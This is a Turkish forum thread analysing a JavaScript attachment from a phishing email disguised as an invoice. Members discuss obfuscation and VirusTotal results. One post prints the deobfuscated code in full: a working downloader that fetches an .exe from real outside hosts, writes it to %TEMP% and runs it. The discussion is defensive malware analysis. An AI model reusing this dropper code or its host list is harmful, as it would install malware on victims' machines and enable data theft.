Js İle Virüs Yazmışlar

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cache
    cache's avatar
    Kayıt Tarihi: 01/Şubat/2014
    Erkek

    Merhabalar, Az önce bir mail aldım. Adamlar fatura diye ittirmeye çalışmış. Zip'in içine js'yi çakmışlar. Function isimleri wgj223, wgj224, wgj225 diye gidiyor. Sanırım cryptolocker gibi birşey. 

    Bakmak isteyenler için: http://paste.ubuntu.com/11792971/

    Gelen mail: http://prntscr.com/7mosrz

     

     


    En iyisi olmadan önce, her zaman en kötüsü olmaz mı ?
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KizilS
    KizilS's avatar
    Kayıt Tarihi: 21/Nisan/2015
    Homo

    sen zaten yazmıyor muydun? winapi kullanımını sordum hatta cevap vermedim. bunu sen yazdın anlamında demedim , şaşırmana şaşırdım

     

    KizilS tarafından 29/Haz/15 16:08 tarihinde düzenlenmiştir
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Bilirkişi
    mkyb
    mkyb's avatar
    Kayıt Tarihi: 27/Mayıs/2011
    Erkek

    https://www.virustotal.com Yükle tüm antivirüsler tanısın hocam. 


    Yaşlandıkça 50 liralık saatin ve 5.000 liralık saatin aynı şeyi gösterdiğini fark edeceksin. 1.000.000 liralık ve 100.000 liralık ev aynı yalnızlığı barındırır. 1.000 liralık Android ile 20.000 liralık iPhone Pro kimse aramadıktan sonra aynıdır. Materyalist şeylerde gerçek mutluluk bulunmaz. Asıl mutluluk bir çift memededir. Enflasyon yüzünden bu imzayı bir ara güncellemek lazım. Bin liraya telefon kalmadı amk.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cache
    cache's avatar
    Kayıt Tarihi: 01/Şubat/2014
    Erkek
    KizilS bunu yazdı

    sen zaten yazmıyor muydun? winapi kullanımını sordum hatta cevap vermedim. bunu sen yazdın anlamında demedim , şaşırmana şaşırdım

     

    Ben yazıyordum da böyle şeyler yazmadım ya, gayet insancıl ve seo için şeyler yazdım :) winapi için sana pm atıcam :)

    mkyb bunu yazdı

    https://www.virustotal.com Yükle tüm antivirüsler tanısın hocam. 

     

    https://www.virustotal.com/tr/file/1c126277b3767e9ecd8763ea117383e5434c4b8530d5955f63bcf92f65cd1f94/analysis/1435583433/

    Yolladım hocam, sanal makinada çalıştırıcam muhtemelen cryptolocker 

     


    En iyisi olmadan önce, her zaman en kötüsü olmaz mı ?
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SkynetX
    SkynetX's avatar
    Kayıt Tarihi: 06/Şubat/2015
    Erkek

    Cryptolocaker dan ziyade reklam gibi bir şey. yazı çıkar büyük ihtimalle.

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cache
    cache's avatar
    Kayıt Tarihi: 01/Şubat/2014
    Erkek
    SkynetX bunu yazdı

    Cryptolocaker dan ziyade reklam gibi bir şey. yazı çıkar büyük ihtimalle.

    Aynen hocam reklam, muhtemelen görüntüleme üstüne para veren bir firmada kullanıyorlar. Get'lerde gif dosyaları iniyor zaten.

    Kodun açılmış hali : http://prntscr.com/7mp4ag

     


    En iyisi olmadan önce, her zaman en kötüsü olmaz mı ?
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SerYolcu
    SerYolcu's avatar
    Kayıt Tarihi: 14/Ocak/2010
    Erkek

    Programın kaynak kodunu böyle anlamsız anlamsız functionlara bölüp,

    karşı tarafta iş yaptırma tekniğinin adı nedir ?


    Ondan çocuk olmamıştır (Kimsenin babası değildir). Kendisi de doğmamıştır (kimsenin çocuğu değildir). İhlas Suresi 3 üncü ayette bunlar yazar.
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    FCN
    FCN's avatar
    Kayıt Tarihi: 28/Eylül/2007
    Erkek
    SerYolcu bunu yazdı

    Programın kaynak kodunu böyle anlamsız anlamsız functionlara bölüp,

    karşı tarafta iş yaptırma tekniğinin adı nedir ?

    obfuscate

  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    babayarisi
    babayarisi's avatar
    Kayıt Tarihi: 17/Mart/2014
    Erkek
    jfunction dl(fr) { 
    	var b = "64.239.115.111 dickinsonwrestlingclub.com idsecurednow.com".split(" "); 
    	for (var i=0; i<b.length; i++) {
    		var ws = new ActiveXObject("WScript.Shell");
    		var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe"; 
    		var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); 
    		xo.onreadystatechange = function() { 
    			if (xo.readyState == 4 && xo.status == 200) { 
    				var xa = new ActiveXObject("ADODB.Stream");
    				xa.open();
    				xa.type = 1;
    				xa.write(xo.ResponseBody); 
    				if (xa.size > 5000) {
    					dn = 1; xa.position = 0;
    					xa.saveToFile(fn,2);
    					try {
    						ws.Run(fn,1,0);
    					} catch (er) {};
    				}; 
    				xa.close();
    			};
    		};
    		try {
    			xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+stroke, false);
    			xo.send(); 
    		} catch (er) {
    		};
    		if (dn == 1) break;
    	} 
    };
    dl(4091); 
    dl(52); 
    dl(2543);
    

     

    downloader çıktı iyimi

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SerYolcu
    SerYolcu's avatar
    Kayıt Tarihi: 14/Ocak/2010
    Erkek
    babayarisi bunu yazdı
    jfunction dl(fr) { 
    	var b = "64.239.115.111 dickinsonwrestlingclub.com idsecurednow.com".split(" "); 
    	
    

     downloader çıktı iyimi

       Bu virüsü nasıl böyle okunabilir hale getirdin ?


    Ondan çocuk olmamıştır (Kimsenin babası değildir). Kendisi de doğmamıştır (kimsenin çocuğu değildir). İhlas Suresi 3 üncü ayette bunlar yazar.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    interfector
    interfector's avatar
    Kayıt Tarihi: 14/Haziran/2011
    Homo

    Downloader demeye gelmiştim yazmış arkadaşlar. Js içine gömüp genelde filezilla ve browserdan veri çekiyorlar böyle.


    Aldanma insanların samimiyetine, menfaatleri için gelirler vecde, vaad etmeseydi allah cenneti, ona bile etmezlerdi secde..
Toplam Hit: 4653 Toplam Mesaj: 16
email virüs js virüsü